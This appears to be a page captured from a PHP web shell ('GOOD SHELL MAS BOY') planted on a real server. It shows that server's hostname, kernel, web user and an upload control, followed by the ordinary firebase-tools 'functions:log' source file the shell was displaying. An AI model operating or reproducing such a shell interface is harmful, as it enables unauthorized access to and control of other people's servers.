GOOD SHELL MAS BOY
Server: Apache/2.4.52 (Ubuntu)
System: Linux vmi1836763.contaboserver.net 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
User: www-data (33)
PHP: 8.4.10
Disabled: NONE
Upload Files
File: //usr/local/lib/node_modules/firebase-tools/lib/commands/functions-log.js
"use strict";
Object.defineProperty(exports, "__esModule", { value: true });
exports.command = void 0;
const opn = require("open");
const qs = require("querystring");
const command_1 = require("../command");
const error_1 = require("../error");
const cloudlogging = require("../gcp/cloudlogging");
const functionsLog = require("../functions/functionslog");
const projectUtils_1 = require("../projectUtils");
const requirePermissions_1 = require("../requirePermissions");
exports.command = new command_1.Command("functions:log")
    .description("read logs from deployed functions")
    .option("--only <function_names>", 'only show logs of specified, comma-seperated functions (e.g. "funcA,funcB")')
    .option("-n, --lines <num_lines>", "specify number of log lines to fetch")
    .option("--open", "open logs page in web browser")
    .before(requirePermissions_1.requirePermissions, ["logging.logEntries.list", "logging.logs.list"])
    .action(async (options) => {
    try {
        const projectId = (0, projectUtils_1.needProjectId)(options);
        const apiFilter = functionsLog.getApiFilter(options.only);
        if (options.open) {
            const url = `https://console.developers.google.com/logs/viewer?advancedFilter=${qs.escape(apiFilter)}&project=${projectId}`;
            opn(url);
            return;
        }
        const entries = await cloudlogging.listEntries(projectId, apiFilter, options.lines || 35, "desc");
        functionsLog.logEntries(entries);
        return entries;
    }
    catch (err) {
        throw new error_1.FirebaseError(`Failed to list log entries ${err.message}`, { exit: 1 });
    }
});